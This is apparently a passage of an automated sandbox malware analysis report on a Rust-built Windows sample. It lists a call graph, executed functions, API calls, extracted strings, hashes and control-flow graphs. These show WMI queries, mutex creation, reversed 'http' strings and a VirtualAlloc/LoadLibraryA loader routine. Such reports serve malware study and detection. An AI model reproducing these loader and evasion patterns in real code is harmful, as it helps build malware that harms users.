77086 25e236e 77085->77086 77087 25e2373 77085->77087 77143 25e20bf 77086->77143 77087->77069 77090 256eb02 SetThreadStackGuarantee 77089->77090 77117 256ec93 77089->77117 77091 256eb26 77090->77091 77092 256eb17 GetLastError 77090->77092 77095 25bee40 57 API calls 77091->77095 77092->77091 77094 256ece6 77092->77094 77183 25ec9a0 48 API calls 77094->77183 77098 256eb3c 77095->77098 77096 256ecd3 77100 256ed31 77096->77100 77101 256ed4b 77096->77101 77099 25cd430 2 API calls 77098->77099 77102 256eb51 77099->77102 77103 256ed46 77100->77103 77104 256ed35 HeapFree 77100->77104 77105 256ed6c 77101->77105 77108 256ed5d HeapFree 77101->77108 77106 256ecd5 77102->77106 77107 256eb59 77102->77107 77103->77071 77104->77103 77105->77071 77182 25ec900 48 API calls 77106->77182 77110 256ec16 77107->77110 77112 256eb75 77107->77112 77108->77105 77179 25bf050 HeapFree HeapFree 77110->77179 77177 2561310 51 API calls 77112->77177 77113 256ec85 77180 25bf1b0 HeapFree HeapFree 77113->77180 77116 256eb98 77118 25bf2a0 48 API calls 77116->77118 77181 25ec9a0 48 API calls 77117->77181 77119 256ebc1 77118->77119 77120 256ebd5 77119->77120 77121 256ec03 77119->77121 77178 25f0460 54 API calls 77120->77178 77121->77071 77123 256ec00 77123->77121 77124->77065 77125->77073 77126->77064 77127->77061 77128->77063 77129->77079 77134 25e73b5 77130->77134 77133 25e04bd 7 API calls 77133->77080 77135 25e73c5 77134->77135 77136 25dd9a4 77134->77136 77135->77136 77138 25e65e2 77135->77138 77136->77083 77136->77133 77139 25e65e9 77138->77139 77140 25e662c GetStdHandle 77139->77140 77141 25e668e 77139->77141 77142 25e663f GetFileType 77139->77142 77140->77139 77141->77135 77142->77139 77144 25e20c8 77143->77144 77148 25e20de 77143->77148 77144->77148 77149 25e20eb 77144->77149 77146 25e20d5 77146->77148 77164 25e2256 9 API calls 77146->77164 77148->77087 77150 25e20f7 77149->77150 77151 25e20f4 77149->77151 77165 25e5833 77150->77165 77151->77146 77153 25e20fd 77154 25e2108 77153->77154 77155 25e2114 77153->77155 77171 25e482f 9 API calls 77154->77171 77172 25e2145 20 API calls 77155->77172 77158 25e210e 77158->77146 77159 25e211b 77173 25e482f 9 API calls 77159->77173 77161 25e2138 77174 25e482f 9 API calls 77161->77174 77163 25e213e 77163->77146 77164->77148 77166 25e583c 77165->77166 77170 25e586e 77165->77170 77175 25e4289 9 API calls 77166->77175 77168 25e585f 77176 25e563e 30 API calls 77168->77176 77170->77153 77171->77158 77172->77159 77173->77161 77174->77163 77175->77168 77176->77170 77177->77116 77178->77123 77179->77113 77180->77117 77182->77096

                                                                                                                                              Executed Functions

                                                                                                                                              Function 02583ABA Relevance: 82.5, APIs: 43, Strings: 11, Instructions: 1522memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                                • Part of subcall function 025D96A2: CoInitializeEx.OLE32 ref: 025D96B8
                                                                                                                                                • Part of subcall function 025D96A2: CoInitializeSecurity.OLE32 ref: 025D96E4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258552A
                                                                                                                                                • Part of subcall function 0257A020: GetCommandLineW.KERNEL32 ref: 0257A05D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258400C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025841A8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$Initialize$CloseCommandHandleLineSecurity
                                                                                                                                              • String ID: $Invalid$\index.crates.io-1cd66030c949c28d\base64-0.21.7\src\engine\general_purpose\decode.rs$`async fn` resumed after completion$a Display implementation returned an error unexpectedly$called `Result::unwrap()` on an `Err` value$hrzbaov$nown$ptth$ptth$rc\unicode\printable.rs
                                                                                                                                              • API String ID: 4247911866-759402994
                                                                                                                                              • Opcode ID: 8faa4e2ac83d390d0596349de99da3c39a4acc53fdee3df431c385f249189adc
                                                                                                                                              • Instruction ID: e5e1b08113553f4f1d41d430e0ede974ece2652b22a05afa8447d3f9d02e6326
                                                                                                                                              • Opcode Fuzzy Hash: 8faa4e2ac83d390d0596349de99da3c39a4acc53fdee3df431c385f249189adc
                                                                                                                                              • Instruction Fuzzy Hash: 0DF29070A04782DFD725DF24C440B9AFBE1FF89304F108A1DE9999B261DB71A895CF86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02591E40 Relevance: 61.5, APIs: 20, Strings: 13, Instructions: 3740memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CD430: GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                                • Part of subcall function 025CD430: RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02591FCF
                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 0259200A
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,00000000), ref: 025922D4
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000001), ref: 02594FE3
                                                                                                                                                • Part of subcall function 025C1BB0: QueryPerformanceCounter.KERNEL32(?), ref: 025C1BF7
                                                                                                                                                • Part of subcall function 025C1BB0: QueryPerformanceFrequency.KERNEL32(00000000), ref: 025C1C38
                                                                                                                                                • Part of subcall function 025D632B: AcquireSRWLockExclusive.KERNEL32(?,00000001,00000000,?,?,025D8053,00000000,026117FC,?,?,?,?,?,?,?,?), ref: 025D6335
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,00000001), ref: 025924D1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025924EE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02593146
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259559D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025955AE
                                                                                                                                              Strings
                                                                                                                                              • thread name may not contain interior null bytes, xrefs: 02595224
                                                                                                                                              • TOKIO_WORKER_THREADS/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\loom\std\mod.rs" cannot be set to 0, xrefs: 02591F5D
                                                                                                                                              • Invalid, xrefs: 02594DE9, 02595039, 02595065, 025951F2, 02595275, 025952C3, 0259540B, 02595437, 025954A5, 025954D1, 025954FD
                                                                                                                                              • attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs, xrefs: 02594E83
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 02595476, 0259551C
                                                                                                                                              • assertion failed: shared.shutdown_tx.is_some()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\pool.rs, xrefs: 025950F6
                                                                                                                                              • assertion failed: self.tail.is_none(), xrefs: 0259514B
                                                                                                                                              • assertion failed: prev.ref_count() >= 1, xrefs: 02595092
                                                                                                                                              • RUST_MIN_STACKfatal runtime error: assertion failed: thread_info.stack_guard.get().is_none() && thread_info.thread.get().is_none(), xrefs: 02592BEE
                                                                                                                                              • Failed building the Runtime, xrefs: 025951BA
                                                                                                                                              • failed to park thread, xrefs: 02595297
                                                                                                                                              • Failed to `Enter::block_on`, xrefs: 025950D6
                                                                                                                                              • driver missing, xrefs: 02595553
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$Free$AllocPerformanceQuery$AcquireAllocateCounterExclusiveFrequencyInfoLockProcessSystem
                                                                                                                                              • String ID: Failed building the Runtime$Failed to `Enter::block_on`$Invalid$RUST_MIN_STACKfatal runtime error: assertion failed: thread_info.stack_guard.get().is_none() && thread_info.thread.get().is_none()$TOKIO_WORKER_THREADS/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\loom\std\mod.rs" cannot be set to 0$assertion failed: prev.ref_count() >= 1$assertion failed: self.tail.is_none()$assertion failed: shared.shutdown_tx.is_some()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\pool.rs$attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$driver missing$failed to park thread$thread name may not contain interior null bytes
                                                                                                                                              • API String ID: 3999484873-2573687003
                                                                                                                                              • Opcode ID: d708b0dcf56937ee15ccf28e2f48e91b5d12b774c2812818d0815b01b1a0b0bb
                                                                                                                                              • Instruction ID: 5dadaaf43f8fada49bce537a6ddb0227d73ce3ef7f9289096a9a54077b272fd0
                                                                                                                                              • Opcode Fuzzy Hash: d708b0dcf56937ee15ccf28e2f48e91b5d12b774c2812818d0815b01b1a0b0bb
                                                                                                                                              • Instruction Fuzzy Hash: EE732A74600B018FDB25CF29C594BA6BBE2BF88304F14896DD9AA8B751DB31F846CF54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0259AA16 Relevance: 46.7, APIs: 24, Strings: 2, Instructions: 1215memorywindowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D9760: CoCreateInstance.OLE32(026137A4,00000000,00000001,02613788,?,?,0259AA3A,0000000A), ref: 025D9781
                                                                                                                                                • Part of subcall function 025D9760: SysFreeString.OLEAUT32(00000000), ref: 025D97EC
                                                                                                                                                • Part of subcall function 025D9760: CoSetProxyBlanket.OLE32 ref: 025D981A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B3D3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B3EC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B405
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0259B436
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 0259B486
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B4A6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B4BF
                                                                                                                                              • GetModuleHandleW.KERNEL32(?), ref: 0259B660
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B678
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B68D
                                                                                                                                                • Part of subcall function 025726A3: HeapFree.KERNEL32(00000000,?), ref: 02572714
                                                                                                                                                • Part of subcall function 025726A3: HeapFree.KERNEL32(00000000,?), ref: 0257275E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B6B2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B6D0
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0259B733
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 0259B764
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B77D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B796
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259B939
                                                                                                                                              • MessageBoxW.USER32(00000000,025C0AB0,0257CDE7,00000011), ref: 0259BA3F
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BA56
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BA6F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BA9A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BAB3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259BCB0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259BCCA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$Heap$BlanketCreateHandleInstanceMessageModuleProxyString
                                                                                                                                              • String ID: ROOT\CIMV2$hrono-0.4.38\src\format\mod.rs
                                                                                                                                              • API String ID: 430375675-823739010
                                                                                                                                              • Opcode ID: 2668a0fa80cd7c7e0c0ccb7c5a2b05fe4e556ebbc743539ec630fbd4659d1e3f
                                                                                                                                              • Instruction ID: 0283ef7ed1b88327eb55b63b11b91fa43f5e2d29a4046fe9feb4cdaba8c5ac54
                                                                                                                                              • Opcode Fuzzy Hash: 2668a0fa80cd7c7e0c0ccb7c5a2b05fe4e556ebbc743539ec630fbd4659d1e3f
                                                                                                                                              • Instruction Fuzzy Hash: BAC27F71A083519FDB65DF18C4807AEBBE2FFC8304F05892DE98997390DB709949CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0259BD08 Relevance: 35.7, APIs: 11, Strings: 7, Instructions: 4163memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D9760: CoCreateInstance.OLE32(026137A4,00000000,00000001,02613788,?,?,0259AA3A,0000000A), ref: 025D9781
                                                                                                                                                • Part of subcall function 025D9760: SysFreeString.OLEAUT32(00000000), ref: 025D97EC
                                                                                                                                                • Part of subcall function 025D9760: CoSetProxyBlanket.OLE32 ref: 025D981A
                                                                                                                                                • Part of subcall function 025CD430: GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                                • Part of subcall function 025CD430: RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0259C457
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0259C474
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0259C492
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C4AE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C69F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C908
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C933
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A015C
                                                                                                                                                • Part of subcall function 02581BFE: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,02581E0B), ref: 02581C2B
                                                                                                                                                • Part of subcall function 025CC4E0: AcquireSRWLockExclusive.KERNEL32(02620B74), ref: 025CC566
                                                                                                                                                • Part of subcall function 025CC4E0: ReleaseSRWLockExclusive.KERNEL32(02620B74), ref: 025CC63D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A00A2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A00E2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0182
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$Heap$String$ExclusiveLock$AcquireAllocateBlanketCreateInstanceProcessProxyRelease
                                                                                                                                              • String ID: 66030c949c28d\base64-0.21.7\src\encode.rs$ROOT\CIMV2$WQL$called `Result::unwrap()` on an `Err` value$d to index str up to maximum usize$sing field `$wr%
                                                                                                                                              • API String ID: 3721730025-2485361945
                                                                                                                                              • Opcode ID: 7e8059c2fd2bbff2fe57664ede1a733ebfdcd0cb8b96195f0899197eb2489f5d
                                                                                                                                              • Instruction ID: 0d41c6777fabfa63d29f2f78e12bda112a062703138528278dcc9428f545a489
                                                                                                                                              • Opcode Fuzzy Hash: 7e8059c2fd2bbff2fe57664ede1a733ebfdcd0cb8b96195f0899197eb2489f5d
                                                                                                                                              • Instruction Fuzzy Hash: DBA34C749087818BD725DF28C080AAAF7F2FFC9304F158A5DDAC947361DB359986CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257A020 Relevance: 34.4, APIs: 17, Strings: 2, Instructions: 1112memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 0257A05D
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0257A5C3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257A5D4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257A687
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257A6A1
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0257A86C
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0257ABDE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AC68
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AC7F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AC99
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0257AD27
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AD94
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257ADAE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257ADC9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257ADE0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AE03
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,025FF438,0260D02C), ref: 0257AEF1
                                                                                                                                              Strings
                                                                                                                                              • Invalid, xrefs: 0257A811
                                                                                                                                              • a Display implementation returned an error unexpectedly, xrefs: 0257AE3C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CommandLine
                                                                                                                                              • String ID: Invalid$a Display implementation returned an error unexpectedly
                                                                                                                                              • API String ID: 10534037-4203860457
                                                                                                                                              • Opcode ID: e884e7428a15c2b9b0f53be4621f113463c89523ce64301062ce99077e4d70d3
                                                                                                                                              • Instruction ID: a830ca2d3c37a6643460c05a46cb33d156f6a91828e10267433266c0bdf43b20
                                                                                                                                              • Opcode Fuzzy Hash: e884e7428a15c2b9b0f53be4621f113463c89523ce64301062ce99077e4d70d3
                                                                                                                                              • Instruction Fuzzy Hash: 4EB226B5A40B018FD734CF29D580B6AF7E2BF98304F14892DD99A87A51EB71F885CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025BE5F7 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 345memorylibraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2980 25be5f7-25be60d 2981 25be60f-25be612 2980->2981 2982 25be617-25be623 2980->2982 2983 25be6a5-25be6a7 2981->2983 2985 25be625-25be633 2982->2985 2986 25be664-25be66e 2982->2986 2987 25be6a9-25be6e0 call 25cd430 2983->2987 2988 25be670-25be675 2985->2988 2989 25be635-25be654 2985->2989 2986->2983 2994 25be9df-25be9ff call 25ec900 GetModuleHandleA 2987->2994 2995 25be6e6-25be70f 2987->2995 2992 25be67a-25be680 2988->2992 2989->2992 2993 25be656-25be65f 2989->2993 2992->2983 2997 25be682-25be6a3 2992->2997 2996 25be8bf-25be8c7 2993->2996 3006 25bea01-25bea11 GetProcAddress 2994->3006 3007 25bea30-25bea32 2994->3007 2998 25be714-25be71a 2995->2998 2999 25be8cb-25be8cf 2996->2999 2997->2987 3001 25be720-25be726 2998->3001 3002 25be7c4 2998->3002 3003 25be8d1-25be8e1 call 256ea05 2999->3003 3004 25be8e4 2999->3004 3008 25be86a-25be874 3001->3008 3009 25be72c-25be73c 3001->3009 3012 25be7c6-25be7ca 3002->3012 3003->3004 3011 25be8e7-25be8f9 3004->3011 3006->3007 3013 25bea13-25bea23 GetProcAddress 3006->3013 3008->2996 3017 25be876-25be878 3008->3017 3014 25be73e-25be742 3009->3014 3015 25be744-25be75b 3009->3015 3018 25be8fd-25be8ff 3011->3018 3019 25be7df-25be81c call 25f1823 3012->3019 3020 25be7cc-25be7da 3012->3020 3013->3007 3022 25bea25-25bea2b 3013->3022 3023 25be7c0 3014->3023 3024 25be75d-25be77b 3015->3024 3025 25be7b5-25be7be 3015->3025 3026 25be87a-25be87f 3017->3026 3027 25be92c-25be92e 3018->3027 3028 25be901-25be903 3018->3028 3019->3020 3020->2998 3022->3007 3023->3002 3030 25be81e-25be824 3024->3030 3031 25be781-25be7aa 3024->3031 3025->3023 3032 25be930-25be935 3026->3032 3033 25be885-25be889 3026->3033 3036 25be966-25be97a CreateMutexW GetLastError 3027->3036 3034 25be950-25be961 HeapFree 3028->3034 3035 25be905-25be91e HeapReAlloc 3028->3035 3039 25be826-25be833 3030->3039 3042 25be7b0-25be7b3 3031->3042 3043 25be866 3031->3043 3037 25be93c-25be94b 3032->3037 3038 25be937-25be93a 3032->3038 3033->3026 3044 25be88b-25be899 3033->3044 3034->3036 3035->3036 3045 25be920-25be927 call 25ec900 3035->3045 3040 25be97c-25be97f 3036->3040 3041 25be981-25be98e 3036->3041 3046 25be9d7-25be9de 3037->3046 3038->3036 3047 25be85d-25be861 3039->3047 3048 25be835-25be858 3039->3048 3040->3041 3049 25be990-25be995 3040->3049 3050 25be9bf-25be9c6 3041->3050 3042->3039 3043->3008 3044->2999 3051 25be89b-25be8a3 3044->3051 3045->3027 3047->3002 3048->3012 3053 25be9ab-25be9b6 3049->3053 3054 25be997-25be9a9 CloseHandle 3049->3054 3050->3046 3055 25be9c8-25be9d1 HeapFree 3050->3055 3051->3018 3056 25be8a5-25be8a7 3051->3056 3057 25be9b9 3053->3057 3054->3057 3055->3046 3058 25be8ba-25be8bd 3056->3058 3059 25be8a9-25be8b7 call 256ea05 3056->3059 3057->3050 3058->3011 3059->3058
                                                                                                                                              APIs
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,00000000), ref: 025BE914
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025BE95B
                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 025BE96B
                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?), ref: 025BE972
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025BE9D1
                                                                                                                                                • Part of subcall function 025CD430: GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                                • Part of subcall function 025CD430: RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 025BE998
                                                                                                                                              • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0,00000000,00000002), ref: 025BE9F7
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 025BEA09
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 025BEA1B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AddressFreeHandleProc$AllocAllocateCloseCreateErrorLastModuleMutexProcess
                                                                                                                                              • String ID: VUUU$WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                                                                                                                              • API String ID: 4042372245-3834393415
                                                                                                                                              • Opcode ID: 55d967e54e466423e095bdf805a064c658e0ace68fa4e1e75b3f517678758ec5
                                                                                                                                              • Instruction ID: d85251f158df52b97471b404b9d6a6df791d13351629f1c617f97471875697e0
                                                                                                                                              • Opcode Fuzzy Hash: 55d967e54e466423e095bdf805a064c658e0ace68fa4e1e75b3f517678758ec5
                                                                                                                                              • Instruction Fuzzy Hash: 9DC1D372E083118FD729CF18D4467AABBE5FF84314F59892DE99A87381E730D845CB89
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042C59F Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 331memorylibraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3062 42c59f-42c638 3063 42c63c 3062->3063 3064 42c63e-42c648 3063->3064 3064->3064 3065 42c64a-42c64b 3064->3065 3065->3063 3066 42c64d-42c654 3065->3066 3067 42c683 3066->3067 3068 42c656-42c661 call 42c955 3066->3068 3069 42c686-42c6f5 call 42c9f5 * 3 VirtualAlloc 3067->3069 3074 42c663-42c672 call 42c973 3068->3074 3084 42c6f8-42c71e 3069->3084 3080 42c674-42c678 3074->3080 3081 42c67e-42c681 3074->3081 3080->3074 3082 42c67a-42c67c 3080->3082 3081->3069 3082->3069 3084->3084 3085 42c720-42c744 VirtualAlloc 3084->3085 3086 42c74a-42c76a 3085->3086 3087 42c94c 3085->3087 3089 42c783-42c7b7 3086->3089 3090 42c76c-42c772 3086->3090 3088 42c94e-42c954 3087->3088 3089->3087 3092 42c7bd-42c7c0 3089->3092 3091 42c774-42c77b 3090->3091 3091->3091 3094 42c77d-42c780 3091->3094 3093 42c7c2-42c7c7 3092->3093 3095 42c7d9-42c7dc 3093->3095 3096 42c7c9-42c7d1 3093->3096 3094->3089 3098 42c7ee-42c802 3095->3098 3099 42c7de-42c7e6 3095->3099 3096->3095 3097 42c7d3-42c7d6 3096->3097 3097->3095 3101 42c804-42c809 3098->3101 3102 42c81a-42c82a 3098->3102 3099->3098 3100 42c7e8-42c7eb 3099->3100 3100->3098 3103 42c80b-42c812 3101->3103 3102->3093 3104 42c82c-42c831 3102->3104 3103->3103 3105 42c814-42c817 3103->3105 3104->3087 3106 42c837-42c83c 3104->3106 3105->3102 3107 42c893-42c89b 3106->3107 3108 42c83e 3106->3108 3107->3087 3109 42c8a1-42c8aa 3107->3109 3110 42c841-42c859 3108->3110 3111 42c902-42c90d 3109->3111 3112 42c8ac-42c8b9 LoadLibraryA 3109->3112 3113 42c88b-42c88e 3110->3113 3114 42c85b 3110->3114 3116 42c938-42c942 call 25dd76d 3111->3116 3117 42c90f-42c920 3111->3117 3112->3087 3119 42c8bf-42c8ca 3112->3119 3113->3110 3118 42c890 3113->3118 3115 42c85d-42c86f 3114->3115 3120 42c871-42c883 3115->3120 3121 42c885-42c889 3115->3121 3126 42c944-42c94a 3116->3126 3117->3116 3122 42c922 3117->3122 3118->3107 3123 42c8f4-42c8fd 3119->3123 3124 42c8cc 3119->3124 3120->3121 3121->3113 3121->3115 3125 42c925-42c933 3122->3125 3123->3112 3128 42c8ff 3123->3128 3127 42c8cf-42c8d3 3124->3127 3133 42c935 3125->3133 3126->3088 3129 42c8d5-42c8d8 3127->3129 3130 42c8da-42c8dd 3127->3130 3128->3111 3132 42c8df-42c8ec GetProcAddress 3129->3132 3130->3132 3132->3127 3134 42c8ee-42c8f1 3132->3134 3133->3116 3134->3123
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000C4E00,00003000,00000004), ref: 0042C6C3
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 0042C8B1
